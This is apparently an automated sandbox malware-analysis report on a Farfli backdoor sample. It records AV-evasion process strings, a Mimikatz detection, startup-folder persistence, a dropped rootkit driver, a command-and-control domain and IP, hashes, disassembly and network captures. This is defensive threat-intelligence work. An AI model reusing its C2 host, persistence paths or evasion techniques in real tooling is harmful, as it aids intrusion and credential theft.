Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: AYAgent.aye
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: QUHLPSVC.EXE
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: RavMonD.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: Mcshield.exe
Source: OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	Binary or memory string: K7TSecurity.exe

Stealing of Sensitive Information:

Yara detected Mimikatz

Show sources

Source: Yara match	File source: 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: OII9x4FeW7.exe PID: 3604, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ogxog.exe PID: 6188, type: MEMORY
Source: Yara match	File source: 1.2.OII9x4FeW7.exe.10101928.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Ogxog.exe.10101928.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.OII9x4FeW7.exe.10110f70.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Ogxog.exe.10110f70.5.raw.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Startup Items1	Startup Items1	Masquerading3	OS Credential Dumping	Query Registry1	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	Non-Standard Port1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Windows Service2	Windows Service2	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery12	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Registry Run Keys / Startup Folder12	Process Injection12	Process Injection12	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	LSASS Driver2	Registry Run Keys / Startup Folder12	Obfuscated Files or Information1	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	LSASS Driver2	Software Packing	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	Remote System Discovery11	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Network Configuration Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	File and Directory Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	System Information Discovery2	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
OII9x4FeW7.exe	73%	Virustotal		Browse
OII9x4FeW7.exe	77%	ReversingLabs	Win32.Backdoor.Farfli
OII9x4FeW7.exe	100%	Avira	TR/Crypt.XPACK.Gen
OII9x4FeW7.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Windows\System32\drivers\QAssist.sys	100%	Avira	RKIT/Agent.ccibt
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	100%	Joe Sandbox ML
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe	77%	ReversingLabs	Win32.Backdoor.Farfli
C:\Windows\System32\drivers\QAssist.sys	47%	ReversingLabs	Win64.Trojan.Generic

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.0.Ogxog.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
2.2.Ogxog.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.0.OII9x4FeW7.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
1.2.OII9x4FeW7.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://ssl.ptlogin2.qq.com%s	0%	Avira URL Cloud	safe
http://ptlogin2.qun.qq.com%s	0%	Avira URL Cloud	safe
http://qun.qq.com%s	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s2010218.f3322.net	58.218.67.253	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ssl.ptlogin2.qq.com%s	OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://xui.ptlogin2.qq.com/cgi-bin/xlogin?appid=715030901&daid=73&hide_close_icon=1&pt_no_auth=1&s_	OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	false		high
http://ptlogin2.qun.qq.com%s	OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://qun.qq.com%s	OII9x4FeW7.exe, 00000001.00000002.247680497.0000000010100000.00000004.00000001.sdmp, Ogxog.exe, 00000002.00000002.514979015.0000000010100000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
58.218.67.253	unknown	China		134769	CHINANET-JIANGSU-CHANGZHOU-IDCChinaNetJiangsuChangzhouID	false

Private

IP
127.0.0.1

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	356280
Start date:	22.02.2021
Start time:	20:41:01
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	OII9x4FeW7.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.adwa.evad.winEXE@8/4@3/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 70.5% (good quality ratio 64%) Quality average: 78.7% Quality standard deviation: 31.3%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe Excluded IPs from analysis (whitelisted): 104.42.151.234, 51.103.5.186, 204.79.197.200, 13.107.21.200, 93.184.220.29, 51.104.144.132, 13.64.90.137, 40.88.32.150, 168.61.161.212, 184.30.24.56, 184.30.21.144, 51.103.5.159, 51.104.146.109, 92.122.213.194, 92.122.213.247, 20.54.26.129 Excluded domains from analysis (whitelisted): cs9.wac.phicdn.net, arc.msn.com.nsatc.net, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, vip1-par02p.wns.notify.trafficmanager.net, skypedataprdcoleus15.cloudapp.net, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, www.bing.com, client.wns.windows.com, skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, dual-a-0001.a-msedge.net, db3p-ris-pf-prod-atm.trafficmanager.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, skypedataprdcolwus16.cloudapp.net Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:41:59	API Interceptor	1096x Sleep call for process: Ogxog.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
58.218.67.253	mgZRDu7Jxu.exe	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CHINANET-JIANGSU-CHANGZHOU-IDCChinaNetJiangsuChangzhouID	mgZRDu7Jxu.exe	Get hash	malicious	Browse	58.218.67.253

JA3 Fingerprints

No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Windows\System32\drivers\QAssist.sys	MoQCvCpfgw.exe	Get hash	malicious	Browse
	dC5i7RPJtz.exe	Get hash	malicious	Browse
	dTCaJ7tQjT.exe	Get hash	malicious	Browse
	KrcT896PNT.exe	Get hash	malicious	Browse
	egy7oSjGz0.dll	Get hash	malicious	Browse
	dPTqTpDNrQ.exe	Get hash	malicious	Browse
	qGMyccscIL.exe	Get hash	malicious	Browse
	d6Ide0bYbh.exe	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe Download File
Process:	C:\Users\user\Desktop\OII9x4FeW7.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	409600
Entropy (8bit):	7.806057633930343
Encrypted:	false
SSDEEP:	6144:2SuxNOug5MI3KBau3EO8iZrEXA2czL6mWzdoZtAznpGuGEwJvfJ0s+VC:3ux9g5F6U2WOWczLygAzN6fJX
MD5:	FF7D3B6003C9058E40AE38A6A7EFE40C
SHA1:	842BBFB81F4A65112BC2D8E4AFF8B976E5DB9A55
SHA-256:	C3304EC52968793AE709CF7C7CAAD6ACAE0BDED8088F06CEFBEE55BDE0A9224F
SHA-512:	486865A075B6D87187EA73AE2E76A7537F8FD63A6743ADFBFC4225573E98187DE4C397771061E92442FB868AB48DF8CDE4B9E4EBBA2EF6D065456C8A4049EE98
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 77%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6...X,..X,..X,..S,..X,y.V,..X,..R,..X,y..,..X,..Y,..X,..i,..X,=.^,..X,..\,..X,Rich..X,........PE..L...0\|.].....................<....................@..........................`......V...................................E...\...(.... ...6...........................................................................................................data...............................@....rsrc....6... ...8..................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\OII9x4FeW7.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\System32\drivers\QAssist.sys Download File
Process:	C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Ogxog.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	77896
Entropy (8bit):	6.14724588578885
Encrypted:	false
SSDEEP:	1536:svHIPCv5eT9OrLPC5VwHrhpTrkt5Ad53vE1qXn9Jm6Y:svHIPmn/rHrhpTrkt52E1qXpY
MD5:	4E34C068E764AD0FF0CB58BC4F143197
SHA1:	1A392A469FC8C65D80055C1A7AAEE27BF5EBE7C4
SHA-256:	6CCE28B275D5EC20992BB13790976CAF434AB46DDBFD5CFD431D33424943122B
SHA-512:	DCEA6D76452B1AC9E3C1FED7463FE873B4DD4603EC67A4E204C27BA2C1EA79415508C3044223626F0AE499A9B7A3D6FB283F0978B5E20A58E959C9440376E98B
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: ReversingLabs, Detection: 47%
Joe Sandbox View:	Filename: MoQCvCpfgw.exe, Detection: malicious, Browse Filename: dC5i7RPJtz.exe, Detection: malicious, Browse Filename: dTCaJ7tQjT.exe, Detection: malicious, Browse Filename: KrcT896PNT.exe, Detection: malicious, Browse Filename: egy7oSjGz0.dll, Detection: malicious, Browse Filename: dPTqTpDNrQ.exe, Detection: malicious, Browse Filename: qGMyccscIL.exe, Detection: malicious, Browse Filename: d6Ide0bYbh.exe, Detection: malicious, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........E.\|\$./\$./\$./U\6/]$./U\ /]$./..{/X$./..x/]$./U\&/Y$./\$./.$./.U/V$./.k/]$./Rich\$./........................PE..d....E\.........."..................@.........@.............................`...............................................................@..<............0..........H....P...... ................................................................................text............................... ..h.rdata..............................@..H.data...0.... ......................@....pdata.......0......................@..HINIT.........@...................... ..b.reloc.......P......................@..B................................................................................................................................................................................................................................................................

\Device\Null Download File
Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	331
Entropy (8bit):	4.92149009030101
Encrypted:	false
SSDEEP:	6:PzLSLzMRfmWxHLThx2LThx0sW26VY7FwAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeT0sBSAFSkIrxMVlmJHaVzvv
MD5:	2E512EE24AAB186D09E9A1F9B72A0569
SHA1:	C5BA2E0C0338FFEE13ED1FB6DA0CC9C000824B0B
SHA-256:	DB41050CA723A06D95B73FFBE40B32DE941F5EE474F129B2B33E91C67B72674F
SHA-512:	6B4487A088155E34FE5C642E1C3D46F63CB2DDD9E4092809CE6F3BEEFDEF0D1F8AA67F8E733EDE70B07F467ED5BB6F07104EEA4C1E7AC7E1A502A772F56F7DE9
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.806057633930343
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	OII9x4FeW7.exe
File size:	409600
MD5:	ff7d3b6003c9058e40ae38a6a7efe40c
SHA1:	842bbfb81f4a65112bc2d8e4aff8b976e5db9a55
SHA256:	c3304ec52968793ae709cf7c7caad6acae0bded8088f06cefbee55bde0a9224f
SHA512:	486865a075b6d87187ea73ae2e76a7537f8fd63a6743adfbfc4225573e98187de4c397771061e92442fb868ab48df8cde4b9e4ebba2ef6d065456c8a4049ee98
SSDEEP:	6144:2SuxNOug5MI3KBau3EO8iZrEXA2czL6mWzdoZtAznpGuGEwJvfJ0s+VC:3ux9g5F6U2WOWczLygAzN6fJX
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........6...X,..X,..X,..S,..X,y.V,..X,..R,..X,y..,..X,..Y,..X,..i,..X,=.^,..X,..\,..X,Rich..X,........PE..L...0\|.]...................

File Icon


Icon Hash:	f0d2ec4ccce8d270

Static PE Info

General
Entrypoint:	0x45c790
Entrypoint Section:	.data
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5D977C30 [Fri Oct 4 17:06:56 2019 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	19d4e66d725c89ba6712b82bebc8196d

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0045B568h
push 0045D560h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [00401010h]
xor edx, edx
mov dl, ah
mov dword ptr [004606ACh], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [004606A8h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [004606A4h], ecx
shr eax, 10h
mov dword ptr [004606A0h], eax
push 00000001h
call 00007FBCC87D18FFh
pop ecx
test eax, eax
jne 00007FBCC87D0CEAh
push 0000001Ch
call 00007FBCC87D0DA8h
pop ecx
call 00007FBCC87D16AAh
test eax, eax
jne 00007FBCC87D0CEAh
push 00000010h
call 00007FBCC87D0D97h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007FBCC87D14D8h
call dword ptr [0040100Ch]
mov dword ptr [00460D58h], eax
call 00007FBCC87D1396h
mov dword ptr [00460690h], eax
call 00007FBCC87D113Fh
call 00007FBCC87D1081h
call 00007FBCC87D0D8Ch
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [00401008h]
call 00007FBCC87D1012h
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007FBCC87D0CE8h
movzx eax, word ptr [ebp+00h]

Rich Headers

Programming Language:

[C++] VS98 (6.0) SP6 build 8804
[EXP] VC++ 6.0 SP5 build 8804
[ C ] VS98 (6.0) SP6 build 8804
[LNK] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x611d0	0x45	.data
IMAGE_DIRECTORY_ENTRY_IMPORT	0x60d5c	0x28	.data
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x62000	0x3690	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0xc8	.data
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.data	0x1000	0x60215	0x60400	False	0.923445109578	data	7.8782253441	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x62000	0x3690	0x3800	False	0.337611607143	data	4.00280030121	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x621e0	0xea8	data	Chinese	China
RT_ICON	0x63088	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0	Chinese	China
RT_ICON	0x63930	0x568	GLS_BINARY_LSB_FIRST	Chinese	China
RT_ICON	0x63ec8	0x10a8	data	Chinese	China
RT_ICON	0x64f70	0x468	GLS_BINARY_LSB_FIRST	Chinese	China
RT_GROUP_ICON	0x63e98	0x30	data	Chinese	China
RT_GROUP_ICON	0x653d8	0x22	data	Chinese	China
RT_MANIFEST	0x65400	0x28b	XML 1.0 document text	Chinese	China

Imports

DLL

Import

KERNEL32.dll

GetProcAddress, GetModuleHandleA, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, GetCurrentThreadId, TlsSetValue, TlsAlloc, SetLastError, TlsGetValue, GetLastError, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, HeapFree, RtlUnwind, WriteFile, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, GetCPInfo, GetACP, GetOEMCP, HeapAlloc, VirtualAlloc, HeapReAlloc, LoadLibraryA, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, InterlockedDecrement, InterlockedIncrement

Exports

Name	Ordinal	Address
Loader	1	0x45c738

Possible Origin

Language of compilation system	Country where language is spoken	Map
Chinese	China

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 20:42:01.029640913 CET	49708	281	192.168.2.5	58.218.67.253
Feb 22, 2021 20:42:01.080394983 CET	49709	8080	192.168.2.5	58.218.67.253
Feb 22, 2021 20:42:04.087625980 CET	49708	281	192.168.2.5	58.218.67.253
Feb 22, 2021 20:42:04.165674925 CET	49709	8080	192.168.2.5	58.218.67.253
Feb 22, 2021 20:42:10.088187933 CET	49708	281	192.168.2.5	58.218.67.253
Feb 22, 2021 20:42:10.213155031 CET	49709	8080	192.168.2.5	58.218.67.253
Feb 22, 2021 20:42:53.948281050 CET	49729	8080	192.168.2.5	58.218.67.253
Feb 22, 2021 20:42:56.951469898 CET	49729	8080	192.168.2.5	58.218.67.253
Feb 22, 2021 20:43:03.081592083 CET	49729	8080	192.168.2.5	58.218.67.253
Feb 22, 2021 20:43:48.058778048 CET	49732	8080	192.168.2.5	58.218.67.253
Feb 22, 2021 20:43:51.049793959 CET	49732	8080	192.168.2.5	58.218.67.253
Feb 22, 2021 20:43:57.065963984 CET	49732	8080	192.168.2.5	58.218.67.253

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 22, 2021 20:41:48.500123978 CET	52704	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:48.505867958 CET	52212	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:48.557265043 CET	53	52212	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:48.559782028 CET	53	52704	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:49.011498928 CET	54302	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:49.060205936 CET	53	54302	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:49.158063889 CET	53784	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:49.223365068 CET	53	53784	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:49.361866951 CET	65307	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:49.413301945 CET	53	65307	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:49.502137899 CET	64344	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:49.550826073 CET	53	64344	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:51.354911089 CET	62060	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:51.403692961 CET	53	62060	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:52.531354904 CET	61805	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:52.580068111 CET	53	61805	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:53.553792953 CET	54795	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:53.602478981 CET	53	54795	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:54.484803915 CET	49557	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:54.542031050 CET	53	49557	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:55.732637882 CET	61733	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:55.784128904 CET	53	61733	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:57.307502031 CET	65447	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:57.358906984 CET	53	65447	8.8.8.8	192.168.2.5
Feb 22, 2021 20:41:58.987716913 CET	52441	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:41:59.036402941 CET	53	52441	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:00.254842997 CET	62176	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:00.304841042 CET	53	62176	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:00.736221075 CET	59596	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:01.060415983 CET	53	59596	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:01.588896036 CET	65296	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:01.642838001 CET	53	65296	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:02.764766932 CET	63183	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:02.813393116 CET	53	63183	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:04.300543070 CET	60151	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:04.360558033 CET	53	60151	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:09.053586960 CET	56969	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:09.115528107 CET	53	56969	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:09.366693974 CET	55161	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:09.426685095 CET	53	55161	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:25.297349930 CET	54757	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:25.348947048 CET	53	54757	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:44.368484974 CET	49992	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:44.425599098 CET	53	49992	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:46.439716101 CET	60075	53	192.168.2.5	8.8.8.8
Feb 22, 2021 20:42:46.488514900 CET	53	60075	8.8.8.8	192.168.2.5
Feb 22, 2021 20:42:52.526004076 CET	55016	53	192.168.2.5	8.8.8.8
